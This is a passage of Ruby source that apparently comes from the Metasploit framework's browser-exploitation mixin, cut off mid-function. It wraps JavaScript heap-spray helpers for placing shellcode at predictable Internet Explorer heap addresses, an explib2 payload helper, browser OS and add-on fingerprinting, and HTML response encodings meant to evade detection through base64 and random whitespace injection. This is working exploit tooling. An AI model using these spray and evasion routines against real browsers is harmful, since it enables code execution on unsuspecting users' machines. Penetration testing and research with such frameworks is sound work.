<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
  #   * You must have the following in <meta>:
  #     	<meta>
  #           <?IMPORT namespace="t" implementation="#default#time2">
  #       </meta>
  #
  # The "mstime_malloc" JavaScript function supports the following arguments:
  #   shellcode     => The shellcode to place.
  #   offset        => Optional. The pointer index that points to the shellcode.
  #   heapBlockSize => Object size.
  #   objId         => The ID to your ANIMATECOLOR element.
  #
  # Example of using "js_mstime_malloc":
  #     <script>
  #     #{js_mstime_malloc}
  #
  #     shellcode = unescape("%u4141%u4141%u4141%u4141%u4141");
  #     offset    = 3;
  #     s         = 0x58;
  #     mstime_malloc({shellcode:shellcode,offset:offset,heapBlockSize:s,objId:oId});
  #     </script>
  #
  def js_mstime_malloc
    @cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc
  end

  #
  # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty)
  # function to trigger allocations by ntdll!RtlAllocateHeap.  It is based on Corelan's
  # publication on "DEPS – Precise Heap Spray on Firefox and IE10".  In IE, the shellcode
  # should land at address 0x0c0d2020, as this is the most consistent location across
  # various versions.
  #
  # The "sprayHeap" JavaScript function supports the following arguments:
  #   shellcode     => The shellcode to spray in JavaScript.  Note: Avoid null bytes.
  #   objId         => Optional. The ID for a <div> HTML tag.
  #   offset        => Optional. Number of bytes to align the shellcode, default: 0x00
  #   heapBlockSize => Optional. Allocation size, default: 0x80000
  #   maxAllocs     => Optional. Number of allocation calls, default: 0x350
  #
  # Example of using the 'sprayHeap' function:
  #   <script>
  #   #{js_property_spray}
  #
  #   var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444");
  #   sprayHeap({shellcode:s, heapBlockSize:0x80000});
  #   </script>
  #
  def js_property_spray
    @cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray
  end

  def js_heap_spray
    @cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray
  end

  def js_explib2
    @explib2 ||= ::Rex::Exploitation::Js::Memory.explib2
  end

  def js_explib2_payload(payload="exec")
    @explib2_payload ||= ::Rex::Exploitation::Js::Memory.explib2_payload(payload)
  end

  def js_os_detect
    @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
  end

  def js_ie_addons_detect
    @cache_ie_addons_detect ||= ::Rex::Exploitation::Js::Detect.ie_addons
  end

  def js_misc_addons_detect
    @cache_misc_addons_detect ||= ::Rex::Exploitation::Js::Detect.misc_addons
  end

  # Transmits a html response to the supplied client
  #
  # HTML evasions are implemented here.
  def send_response_html(cli, body, headers = {})
    body = body.to_s.unpack("C*").pack("C*")
    if datastore['HTML::base64'] != 'none'
      case datastore['HTML::base64']
        when 'plain'
          body = Rex::Text.encode_base64(body)
        when 'single_pad'
          body = Rex::Text.encode_base64(' ' + body)
        when 'double_pad'
          body = Rex::Text.encode_base64('  ' + body)
        when 'random_space_injection'
          body = Rex::Text.encode_base64(body)
          new = ''
          while (body.size > 0)
            new << body.slice!(0, rand(3) + 1) + Rex::Text.rand_text(rand(5) + 1, '', " \n")
          end
          body = new
      end

      body = 	'<HTML><BODY><OBJECT ID="' + Rex::Text.rand_text_alpha(rand(10)+5) + '" ' +
          'HEIGHT="100%" WIDTH="100%" TYPE="text/html" DATA="data:text/html;base64,' +
          body + '">Could not render object</OBJECT></BODY></HTML>